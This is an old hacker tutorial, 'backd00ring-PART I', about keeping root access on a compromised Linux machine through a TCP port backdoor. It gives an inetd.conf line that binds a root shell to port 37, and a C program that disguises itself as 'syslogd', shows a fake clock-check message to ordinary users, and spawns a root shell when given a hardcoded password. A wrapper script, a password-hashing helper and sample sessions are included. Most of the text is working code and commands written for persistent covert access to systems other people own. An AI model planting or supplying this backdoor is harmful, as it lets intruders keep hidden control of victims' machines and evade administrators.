backd00ring-PART I
CHAMPION
radigy@geocities.com
back doors, hacking, cracking, root



before 4 years when I saw linux 4 the 1st time, I was wondering
about the meaning of the word 'hacking', 'backdooring' and etc. 
Later I got the 'meaning' and now Im writing this staff about backdoors. 
Here I will not talk about how to get root access,making/using exploits 
or sniffing someone network.


Before you start backdooring you must have root(admin) 
privillege on victim's machine(you can find more on how 
to get root, on www.rootshell.com, ftp.technotronic.com).

 
When you got r00t you are the king of the machine and if 
you have enough brain, you can control victim's 4ever. 
For this reason you must make a little doors, which can 
give you access to the hacked OS, even the admins found that 
they are hacked. 


There are a lot of different types of backdoors, here I will explain
TCP/IP port backdoor. 


The idea is to make one of the not so useable ports (like
time,discard,chargen) to listen for incoming conections on which if you
connect you will receive access with r00t ID.


The simple way is to edit /etc/inetd.conf and to insert the following
line:
------------------------------------------------------
time 	stream 	tcp 	nowait 	root 	/bin/sh sh -i
---------------------- cut here ----------------------


Next, you must restart your inetd:


------------------------------------------------------
killall -HUP inetd
---------------------- cut here ----------------------


Now you can try to connect on port 37(time), and you will recieve root
shell.
---
# telnet localhost 37
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
sh: no job control in this shell
sh-2.02# id
id
uid=0(root) gid=0(root)
sh-2.02#
---
This method is verry simple and Im not advising u to use it.
My solution about making port backdoor work 4 u is to protect the
port with passw0rd.


Here is a little C program which will be executed if you try to connect on
given port number(in example on 37 port). The program will print the
greeting message /etc/issue, and after that will wait for password(default
password is 'blackbox' with default salts '6S'),if you type wrong password
the conection will be terminated, otherwise you will be granted with root
access.

---------------------------------------------------------------
/* clockchk.c created by CHAMPION */
/* to comile: 
gcc clockchk.c -o /sbin/clockchk -lnsl -lcrypt -O6 -DCRYPT_PASS
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pwd.h>
#include <unistd.h>
#define password "6Sx0frZdJoPOY"
#define salts "6S"

main(int argc, char *argv[])
{
int i=0;
char *s;
if (getuid()==0)
        {
        bzero(argv[0],200);
        strcpy(*argv,"syslogd");
        system("cat /etc/issue");
        s=crypt(getpass(""),salts);
        if (!strcmp(s,password)) system("/bin/sh -i");
        }
                else {
                printf("\nChecking system clock...");
                for (;i<3;i++) sleep(1);
                printf("\nSystem clock is ok.\n");
                }
}
---------------------- cut here ----------------------


After you compile the program with:
gcc clockchk.c -o /sbin/clockchk -lnsl -lcrypt -O6 -DCRYPT_PASS
it will be placed in /sbin. Next insert this line in your /etc/inetd.conf


------------------------------------------------------
stream 	tcp 	nowait 	root  /bin/sh sh /sbin/ccheck
---------------------- cut here ----------------------

where /sbin/ccheck is the name of bash script (type 'man bash' to see why
you can't execute bin files directly from /bin/sh :))

------------------------------------------------------
#!/bin/sh
/sbin/clockchk
---------------------- cut here ----------------------

Place this script in /sbin/ccheck, after that make 'killall -HUP inetd',
and try to conect to 37 port. You will be prompted for pass, type 
'blackbox' and
that's it.


---:))
# telnet localhost 37
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Welcome to RH Linux 6.0 (i386).

blackbox
sh: no job control in this shell
sh-2.02# id
id
uid=0(root) gid=0(root)
groups=0(root),1(bin),14(uucp),15(shadow),16(dialout),65534(nogroup)
sh-2.02#
---:))

The password used in clockchk.c is encrypted for security reasons, you can
use this small program to encrypt your pass:
-------------------------------------------------------
/* mkpass.c created by CHAMPION*/
#include <stdio.h>
#include <pwd.h>
#include <unistd.h>

#define salts "6S"

main(int argc, char *argv[])
{
if (argc!=2) {printf("\nUse: mkpass your_password\n");exit(0);}
printf("\nEncrypted pass: %s\n",crypt(argv[1],salts));
}
/* END */
---------------------- cut here ----------------------

This is my simple solution, about using the TCP/IP port backdoor, you can
enhanche it in your own way. There are also UDP port backdoors, but I
will not comment them here. Thats all 4 now, any comments and suggestions
send to:
radigy@geocities.com
champion
<::>